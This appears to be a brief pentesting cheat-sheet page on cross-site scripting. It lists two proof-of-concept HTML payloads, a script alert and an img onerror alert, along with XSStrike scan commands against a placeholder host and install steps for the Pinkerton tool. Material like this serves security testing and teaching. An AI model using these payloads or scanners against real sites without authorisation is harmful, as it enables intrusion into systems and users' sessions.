XSS
XSS with HTML
<p><script>alert(document.domain)</script></p>
<p><img src=1 onerror=alert(1)></p>Automation
XSSTRIKE
# GET request
python xsstrike.py -u http://vulnerable.com/?param=test
# POST reqeust
python xsstrike.py -u http://vulnerable.com/post --data "username=test&email=test&comment=test"
# data as JSON
python xsstrike.py -u http://vulnerable.com/comment --data '{"comment": "test"}' --json
PINKERTON
git clone https://github.com/oppsec/pinkerton.git
pip3 install -r requirements.txt
python3 main.py -u https://example.comLast updated
Was this helpful?